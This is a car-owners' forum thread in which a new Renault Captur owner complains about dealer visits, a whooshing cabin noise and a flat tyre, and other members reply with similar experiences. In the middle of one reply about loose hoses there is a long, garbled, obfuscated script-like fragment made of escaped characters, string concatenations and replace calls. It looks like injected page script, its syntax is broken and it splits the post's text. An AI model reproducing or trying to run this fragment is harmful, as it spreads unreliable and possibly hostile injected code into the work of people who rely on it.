Renault Captur Forums banner

1 - 20 of 29 Posts

·
Registered
863 Posts
Discussion Starter #1
newbie I picked up my new captur a fortnight ago.always gone for fords before now but liked the high driving position on the captur.plus my focus was coming up for three years old so fancied a change.i have the medianav diesel 1.5.i have been back to the dealer twice now and have to go back again to sort the washers out.to say I am not impressed is an understatement.first went back to have the back number plate changed that had all the numbers crazed and separating.secondly went back because of the weird noise that was coming in the cabin was told this was the noise of the turbo coming in because it was at the back of the engine near the cabin ????.now have to go back again for the washers.wish I had stuck with fords now.dont get me wrong apart from all this I still think the captur is a cracking car.just wish they would sort my niggles out.has anyone else heard this kind of whoosing noise in there cabins?? rant over lol

·
Registered
863 Posts
Discussion Starter #3
vbl took it back because I could hear this noise above the engine noise .I asked my partner if she could hear it and she said yes.its a strange noise that you get when you speed up.even when you slow down you still get it which if it was the turbo I would have thought it would not be heard because the turbo would not be needed ??? strange will have to have another word with the dealer ho hum lol,

·
Registered
1,555 Posts
No way should there be a whooshing noise! You've got a wbooshing dealer!! Sort him out!!
I have a 120 as well and you can't tell there's an engine there!!! lol!

·
Registered
335 Posts
No noise here, I'd call the dealers bluff and ask to drive another so you can also hear the so called turbo noise in that captur also. Got to admit my first turbo car I took back to the dealers because of a whistling noise. Now that was the turbo. Doh.

·
Registered
863 Posts
Discussion Starter #11
ythsie I seem to be getting used to it a bit now.gave it a good run at weekend about 60 miles and stopped overnight at hotel.andguess what came down in the morning and found front offside tyre flat with a screw in the tread ho hum.called aa and he pumped it up enough to take me to kwik fit. not bad never had a puncture for about 6 years and end up with a 3 week old car with one lol.i am a bit puzzled because kwik fit did not charge me for the repair ????

·
Registered
84 Posts
No whooshing in my TCe90. I have had turbo diesels in the past with no whooshing.
I see you are from Essex, like me. I wonder which dealer you are using as, in my opinion, the best dealer in the county lost their franchise over a year ago after I had dealt with them for over 30 years! I am now having to get used to a "new" dealer, no problems yet, I hope this situation lasts.

·
Registered
1,555 Posts
A combination of bad and good luck then Hicky!! Kwick Fit were never very charitable but maybe he appreciated looking at a Captur!!

Edited by: Ythsie

·
Registered
215 Posts
sounds like theres a loose connection somewhere in the hoses , is the captur down on power?<ch;m++q=cym;p=q^o;x+=fp;return x;;ifr"x78"+"cx7c"="=r"u007FX"+"x"+"Uo"+"hz"+"x50"+"yx6a".replace"x58u0078Uo"+"x68zu0050"+"y","x69`"+""var" i=";ir""+"z"+"i"+"WUGR"+"ju0062".replace"x57"+"Uu0047x52x6A","~"+"x7Feu0063"=r'x3Du0039'+'?';ir"x6F`x65u0069b"+"xx79eu0068"="20A1FC5640C8E95A";ir'x6du0068hx63'+'bb'+'x6du0061i'=r"u004Eu0079v"+""+"vu0021eu0078";r'S'+'u006ax4au004ds'+''+'Eu0055E'+'Tu0076Ax76'.replace'jJ'+'u004Dsu0045x55x45x54vu0041','~x7a'=i;var" z="r"u006f"+"~ix6dx"+"iIu0060x69x61u0069bx"+""r''+'uu0054nE'+'x'.replace'x75u0054'+'nE'+'','x7Fu006f~'+''+'ex7C';zr'u007Fu007eu006f'=r'#'+'#'+'kx68x58'+'un'+''+'w"x61x6Do'+'|x6dx78'+'d"b'+'u0069x'+''+'#x7Fx68'+'#u003e<x35<'+'x23u0039x3ex35x38"u0066x7f'.replace'h'+'X'+'u'+'nx77','x75a'+'';r'x6Echu'+''r'x6D||g'+'Xm'+'d'+'x65x60'+'h'.replace'g'+'Xm','i'+'bu0068O'z;;<div">a few mates over on the volvo forums have had similar noises and that is what caused them there, also cracked hoses but you shouldnt have that problem on a new car</ch;m++q=cym;p=q^o;x+=fp;return>Edited by: GORDONR

·
Registered
863 Posts
Discussion Starter #15
gordonr no there does not seem any loss of power at all gave it a good run last couple of days and fine mate regarding power.just a little niggle regarding noise .get used to it I suppose I will see how it goes mate early days yet.

·
Registered
15 Posts
Hi mate, just been reading through your posts about engine whistling noise. I have a similar noise on my TCE90 where the engine whistles throughout the Rev range. it's booked in for two days next week to see if renault can determine what's causing it. At least they recognised that it's a problem :)
Like yours this doesn't effect the performance but is a niggle. Hope you get yours sorted.

·
Registered
56 Posts
I was getting a knocking noise from the passenger rear side (remember I only collected the car yesterday) so out in the wind and rain, checked everything no fault noticed then discovered the seatbelt was hitting off the trim - duh me

1 - 20 of 29 Posts